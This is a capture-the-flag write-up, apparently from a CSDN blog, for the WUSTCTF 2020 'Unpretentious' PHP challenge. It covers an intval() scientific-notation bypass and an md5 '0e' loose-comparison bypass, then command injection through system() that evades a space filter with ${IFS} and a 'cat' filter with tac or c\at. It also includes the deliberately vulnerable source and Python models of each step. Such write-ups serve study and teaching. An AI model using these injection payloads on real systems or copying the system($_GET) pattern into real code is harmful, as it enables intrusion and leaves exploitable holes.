[WUSTCTF 2020] Unpretentious wp


Nothing is visible on the page and capturing the traffic in Burp shows nothing useful either, so I scan it with dirsearch and find `robots.txt`.

Visiting `robots.txt` reveals `/fAke_f1agggg.php`.

Visiting /fAke_f1agggg.php shows only a fake flag: a dead end on its own. Capturing the raw response in Burp, however, tells a different story: it carries a hint pointing to the real source file, fl4g.php.

Get the source code (the opening `<?php` tag was missing from the listing and is added here; the Chinese flavor strings are left as-is with English translations in comments):

```php
<?php
//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        // "I casually glanced at my Rolex, not to check the time, just to let you know I'm doing better than you."
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题"); // "Money can't solve the poor's fundamental problem"
    }
}else{
    die("去非洲吧"); // "Go to Africa"
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       // "Thinking of this CTFer getting the flag, moved to tears, running to a restaurant, kicking the chef out and cooking for himself..."
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲"); // "I called a friend, he made a call and sent his family to Africa"
}else{
    die("去非洲吧"); // "Go to Africa"
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        // "The happiness of the rich is often just this plain and boring."
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了"); // "Almost in Africa"
    }
}else{
    die("去非洲吧"); // "Go to Africa"
}
?>
```

Let's go through the three levels in order, starting with level 1.

```php
//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>"; // pass
    }else{
        die("金钱解决不了穷人的本质问题"); // fail
    }
}else{
    die("去非洲吧"); // no num parameter
}
```

Level 1 hinges on intval(): we have to supply a value that intval() sees as less than 2020, while intval($num + 1) comes out greater than 2021.

About bypassing intval()

`int intval(mixed $value, int $base = 10)`

Notes:
If base is 0, the base is determined from the format of value:

◦ if the string has a "0x" (or "0X") prefix, hexadecimal is used; otherwise,

◦ if the string starts with "0", octal is used; otherwise,

◦ decimal is used.

Digits after the decimal point are discarded (truncation toward zero, not rounding): intval(2019.9) is 2019.

The key point is that $_GET values are strings, and PHP converts a string to an integer in two different ways here. In the challenge's PHP version (before 7.1), intval() on a string behaves like C's strtol(): it reads the leading digits and stops at the first non-digit, so intval("2019e10") is 2019. The arithmetic in $num + 1, however, treats "2019e10" as a numeric string in scientific notation and produces the float 2.019e13; adding 1 and passing the result to intval() gives a value far above 2021. The letter therefore cannot be arbitrary: "2019a" also has intval 2019, but "2019a" + 1 is just 2020, so the second test fails. Only exponent notation (digits, e, digits) makes the two conversions disagree. Caveat: PHP 7.1 changed intval() and (int) casts to honour scientific notation, so there intval("2019e10") is 20190000000000 and this payload depends on the target running an older PHP.

So we can construct the payload:

http://node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10
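To make the version dependence concrete, here is an added Python model of the two PHP conversions involved. It is not part of the original writeup and only approximates PHP's rules for leading-numeric strings: `php_intval_legacy` mimics the strtol-style intval() of PHP before 7.1, `php_intval_modern` mimics PHP 7.1 and later where exponent notation is honoured, and `php_numeric_value` gives the operand PHP uses for `$num + 1`. `level1_check` replays the level-1 condition with either intval.

```python
import re

# Longest numeric prefix PHP accepts when a string meets an arithmetic operator
# ("2019e10abc" -> 2019e10, "2019a" -> 2019). Simplified model: no hex/binary
# prefixes and no trailing-whitespace rules.
NUMERIC_PREFIX = re.compile(r'^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?')
LEADING_INT = re.compile(r'^\s*[+-]?\d+')


def php_intval_legacy(s: str) -> int:
    """intval() on a string in PHP < 7.1: strtol() semantics, stop at the first non-digit."""
    m = LEADING_INT.match(s)
    return int(m.group()) if m else 0


def php_numeric_value(s: str):
    """Value PHP uses for `$s + 1`: exponent or decimal notation gives a float,
    plain digits an int, a string with no leading digits 0."""
    m = NUMERIC_PREFIX.match(s)
    if not m:
        return 0
    text = m.group().strip()
    return float(text) if re.search(r'[.eE]', text) else int(text)


def php_intval_modern(s: str) -> int:
    """intval() on a string in PHP >= 7.1: numeric prefix, exponent included, truncated to int."""
    return int(php_numeric_value(s))


def level1_check(num: str, intval) -> bool:
    """Replays `intval($num) < 2020 && intval($num + 1) > 2021` with the given intval()."""
    return intval(num) < 2020 and int(php_numeric_value(num) + 1) > 2021


if __name__ == "__main__":
    for payload in ["2019", "2019a", "2019e10"]:
        print(f"{payload:>8}: legacy={level1_check(payload, php_intval_legacy)} "
              f"modern={level1_check(payload, php_intval_modern)}")
```

With "2019a" the arithmetic operand is the leading-numeric 2019, so `$num + 1` is 2020 and the second comparison fails under both models; with "2019e10" the operand is the float 2.019e13, which passes the legacy check but fails the modern one because intval("2019e10") is no longer 2019.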

Next, level 2:

```php
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>"; // pass
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲"); // fail
}else{
    die("去非洲吧"); // no md5 parameter
}
```

md5 weak comparison

For a weak comparison of the form $a == md5($a), the array trick does not work: md5() of an array returns NULL with a warning (a TypeError in PHP 8), and a non-empty array is not == NULL. Instead we use the 0e bypass.

For certain special strings the md5 digest begins with 0e followed only by decimal digits. PHP treats such a string as a number in scientific notation, 0 × 10^n = 0, so when both sides of == have this form they compare as 0 == 0 and the check passes. The input itself must therefore also have the form 0e<digits>; a non-numeric string would be compared as plain text. 0e215962017 is a well-known value whose md5 is 0e291242476940776845150308577824.

Construct payload:

http://node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10&md5=0e215962017
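As an added example (not from the original writeup), the Python below checks why 0e215962017 works, models PHP's loose comparison for the numeric-string case, and includes a brute-force finder of the kind used to discover such strings. The regexes are a simplified rendering of PHP's numeric-string rules.

```python
import hashlib
import re

# A "magic" string for the 0e trick must itself be 0e<digits> (so PHP parses it as a
# numeric string) and its md5 hex digest must also be 0e<digits>.
ZERO_E = re.compile(r'^0e\d+$')
# Simplified PHP numeric-string shape: optional sign, digits, optional fraction/exponent.
NUMERIC_STRING = re.compile(r'^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?\s*$')


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_md5(s: str) -> bool:
    """True when both s and md5(s) have the form 0e<digits>."""
    return bool(ZERO_E.match(s)) and bool(ZERO_E.match(md5_hex(s)))


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP `==` on two strings: two numeric strings compare as numbers
    (PHP 5, 7 and 8 alike), anything else compares as text."""
    if NUMERIC_STRING.match(a) and NUMERIC_STRING.match(b):
        return float(a) == float(b)
    return a == b


def find_magic(start: int, count: int):
    """Try 0e<start>, 0e<start+1>, ... and return the first magic candidate, or None.
    Hits are rare (about one in 3e8: 1/256 for the 0e prefix times (10/16)^30 for
    thirty decimal digits), so a real search needs a large count."""
    for i in range(start, start + count):
        cand = f"0e{i}"
        if is_magic_md5(cand):
            return cand
    return None


if __name__ == "__main__":
    s = "0e215962017"
    print(s, "->", md5_hex(s), "| PHP s == md5(s):", php_loose_eq(s, md5_hex(s)))
```

Note that a plaintext such as QNKCDZO, whose md5 also starts with 0e, does not satisfy $a == md5($a): the left side is not a numeric string, so PHP falls back to a byte-wise string comparison.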

Finally, the get_flag stage:

```php
//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){                                   // any space -> rejected
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);   // case-insensitive keyword rewrite
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);                                        // command injection
    }else{
        die("快到非洲了"); // space found
    }
}else{
    die("去非洲吧"); // no get_flag parameter
}
?>
```

Here the value of get_flag goes straight into system(). First, run ls to see where the flag is:

node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10&md5=0e215962017&get_flag=ls

The flag file has a long name beginning with flll. Two things stand in the way in the source: any space is rejected by strstr(), and cat is rewritten to wctf2020 by str_ireplace(), case-insensitively, so CAT does not help either. There are many ways to express a space without typing one, for example ${IFS} or $IFS$9; pick one. Replace cat with tac (or break the keyword up, e.g. c\at, which the shell collapses back to cat after the filter has run) and let a glob match the long file name:

http://node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10&md5=0e215962017&get_flag=tac${IFS}flll*
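As an added example (not from the original writeup), the Python below reproduces the server-side filter from the source and then hands the filtered string to `/bin/sh -c`, exactly as PHP's system() does, inside a temporary directory holding a constructed flag file whose name starts with flll (the real file name and flag are not reproduced). It shows why `cat flll*` is blocked, why `cat${IFS}flll*` survives the space check but is mangled into a non-existent command, and why `tac${IFS}flll*`, `tac$IFS$9flll*` or a broken-up `c\at` read the file.

```python
import os
import re
import subprocess
import tempfile

# Constructed stand-in for the flag file: a long name starting with "flll" so the
# payload's glob matches it. Contents are a made-up flag.
FLAG_NAME = "fllllllllllllllllllaaaaaaaaaaag.php"
FLAG_VALUE = "wctf2020{constructed_example_flag}"


def php_filter(get_flag: str):
    """Mirror of the PHP checks: strstr($get_flag, " ") rejects any space,
    str_ireplace("cat", "wctf2020", ...) rewrites the keyword case-insensitively."""
    if " " in get_flag:
        return None  # die("快到非洲了")
    return re.sub("cat", "wctf2020", get_flag, flags=re.IGNORECASE)


def php_system(cmd: str, cwd: str) -> str:
    """PHP system() passes the string to /bin/sh -c; return what the shell wrote to stdout."""
    proc = subprocess.run(["/bin/sh", "-c", cmd], cwd=cwd,
                          capture_output=True, text=True)
    return proc.stdout


def try_payload(payload: str) -> str:
    """Run one get_flag value through filter + shell in a throwaway web root."""
    with tempfile.TemporaryDirectory() as webroot:
        with open(os.path.join(webroot, FLAG_NAME), "w") as fh:
            fh.write(FLAG_VALUE + "\n")
        filtered = php_filter(payload)
        if filtered is None:
            return "blocked: contains a space"
        return php_system(filtered, webroot).strip()


if __name__ == "__main__":
    for p in ["cat flll*", "cat${IFS}flll*", "tac${IFS}flll*",
              "c\\at${IFS}flll*", "tac$IFS$9flll*"]:
        print(f"{p:<20} -> {try_payload(p)!r}")
```

`${IFS}` expands to the shell's default field separators (space, tab, newline), so after expansion the word splits into `tac` and `flll*`, and pathname expansion then resolves the glob; `$IFS$9` works the same way because `$9` is an empty positional parameter. `cat${IFS}flll*` passes the space check, but str_ireplace() turns it into `wctf2020${IFS}flll*`, which the shell fails to find as a command.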


Origin blog.csdn.net/Leaf_initial/article/details/131610942